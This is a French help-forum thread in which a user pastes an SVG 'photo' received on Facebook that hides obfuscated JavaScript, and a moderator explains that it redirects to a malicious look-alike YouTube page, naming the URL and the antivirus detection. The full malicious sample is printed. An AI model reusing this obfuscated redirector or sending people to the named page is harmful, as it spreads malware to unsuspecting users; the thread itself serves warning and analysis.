Script java recu sur Facebook !

Résolu
BuddyLove_x52 Messages postés 123 Date d'inscription   Statut Membre Dernière intervention   -  
BuddyLove_x52 Messages postés 123 Date d'inscription   Statut Membre Dernière intervention   -
Salut tout le monde, j'ai une question !

On m'as envoyé un script sur Facebook ce faisant passé pour une photos. Etant donné que je connais un peut l'informatique j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg j'ai donc ouvert avec Notepad et je suis tomber sur ce script : 

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "[http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22>
<svg http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg] version="1.1" xmlns="[http://www.w3.org/2000/svg%22> http://www.w3.org/2000/svg">]  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function jzaehxu(lslzqi,dszrj,ztmdf){
      var zdvsmv = "./JHU_SrnVmFZxljy8:d2Y=k3h?CcMbfoaED65zIONK7gPTpLusXBvt0iAR94G1e";
      var rcqlrb = ["OH\/kPZRAU0z3u=heGcELI4B:67TNgtCK58noXS.jmlFy?VvprDbJ1i9_YfaxMd2s",".LKoClD2zOV0xrHkgIhymN?pP1neEGa7:fut_cd\/6SXF=4R9TUMJ5A3bjvZYi8sB","g\/6XIbuf=15eGPvKHF_9saixjC?2rZL:zyJAt0Vhc3OmN.k84Bpn7RoEMDUTdlYS","ko_A1LE6KNS903Te.JbuV27\/pHljYxdZX4RtgmiM8PDc?zvBaIFyns5fh:GCU=Or","XH7x3bYcCiD5g8E.pGeUIavmRZ6VBOkL9KyrS\/=MTJd_1ton0:PjFuN4zA2sf?lh","4M2z_U:eSiJIxP16avjmkL=.s3tlZbDp\/V5?FEO09dgHTfrXBoKGAy7CcRYunhN8","oYui.a3VAcSF5Ed4pt:6nKOR\/e?_HfUN7sbMr9lXLCx8PyIhg0=ZJTG1Bjz2Dkvm","fo:gyRJVjh=eU_sBXZaSTPD5EtA8L\/0m2G1cIF64xvn7r9pYNbl?.3MKzuiHdOkC","verIn5GYVdoK1HA96\/hazRp7:cELUub02PDMTCJ4xOmNgBF3_y8.i=Xsftk?jZSl"];
      var dbtli = "";
      var dhonon = 0;
      while(rcqlrb[dhonon]){
        dhonon++;
      }
      var ucscy = 0;
      while(lslzqi[ucscy]){
        var stoum = 0;
        var mrdfz = -1;
        while(zdvsmv[stoum]){
          if(zdvsmv[stoum] == lslzqi[ucscy]){
            mrdfz = stoum;
            break;
          }
          stoum++;
        }
        if(mrdfz >= 0){
          var wdmdam = 0;
          var vadtty = -1;
          while(rcqlrb[ucscy%dhonon][wdmdam]){
            if(rcqlrb[ucscy%dhonon][wdmdam] == lslzqi[ucscy]){
              vadtty = wdmdam;
              break;
            }
          wdmdam++;
          }
          dbtli += zdvsmv[vadtty];
        }else{
          dbtli += lslzqi[ucscy];
        }
        ucscy++;
      }
      var mhmisv = "";
      for(acaod=dszrj;acaod<dbtli.length;acaod++){
        mhmisv += dbtli[acaod];
      }
      dbtli = mhmisv;
      return dbtli;
    }
  var opree = window;
  var lukdy = jzaehxu("wwLicJs_Ai1R59X",12,false);
  var jjwun = jzaehxu("p1=3w17LP9jzK",5,false);
  var vsyhb = jzaehxu("w15/c/Vzc72SZ",9,false);
  opree[lukdy][jjwun][vsyhb] = jzaehxu("sHSs88eMXph/oc/Gb8sASiK4BMyp.8wHXeYe92BFN4ht3",6,true);
  ]]></script>
</svg>


Quelqu'un peut-il me dire ce qu'il exécute ? Merci ! :)
A voir également:

1 réponse

Réponse 1 / 1
KX Messages postés 16761 Date d'inscription   Statut Modérateur Dernière intervention   3 020
 
Bonjour,

"j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg"
Pourtant SVG est bien un format image valide : Scalable Vector Graphics

"j'ai donc ouvert avec Notepad et je suis tomber sur ce script"
Effectivement, SVG est un format qui peut se lire (et s'écrire) textuellement au format XML, ce qui ressemble bien à ce que tu nous montres. Et peux aussi exécuter du JavaScript lorsqu'il est lancé dans une page web.

Ton fichier est donc bien une image SVG tout à fait valide, qui dessine un rond rouge... En revanche, lorsque la partie JavaScript est exécutée ça redirige vers une page web, qui ressemble à YouTube (où je déconseillerais de trop s'attarder) http://orezupe.hav.pw/ucirepego.html

Plus d'info sur la manière dont fonctionne SVG, y compris sur sa partie JavaScript (qui n'a rien à voir avec Java) : https://www.alsacreations.com/tuto/lire/1421-svg-initiation-syntaxe-outils.html
La confiance n'exclut pas le contrôle
0
KX Messages postés 16761 Date d'inscription   Statut Modérateur Dernière intervention   3 020
 
Bonjour,

Je reviens avec cet article d'information :

https://www.lci.fr/high-tech/un-nouveau-virus-locky-se-propage-sur-facebook-messenger-et-linkedin-voici-comment-eviter-de-vous-faire-pieger-2013860.html

Remarque : mon antivirus a été capable de repérer ce fichier comme dangereux et l'a placé en quarantaine (HTML/ExpKit.Gen2)

NB. je déplace ta discussion dans le forum Virus/Sécurité.
0
BuddyLove_x52 Messages postés 123 Date d'inscription   Statut Membre Dernière intervention  
 
Merci de ton aide ! :)
0

Discussions similaires

Java : Jeux gratuits à télécharger !
undertaker3 -
neogenesis -

1 réponse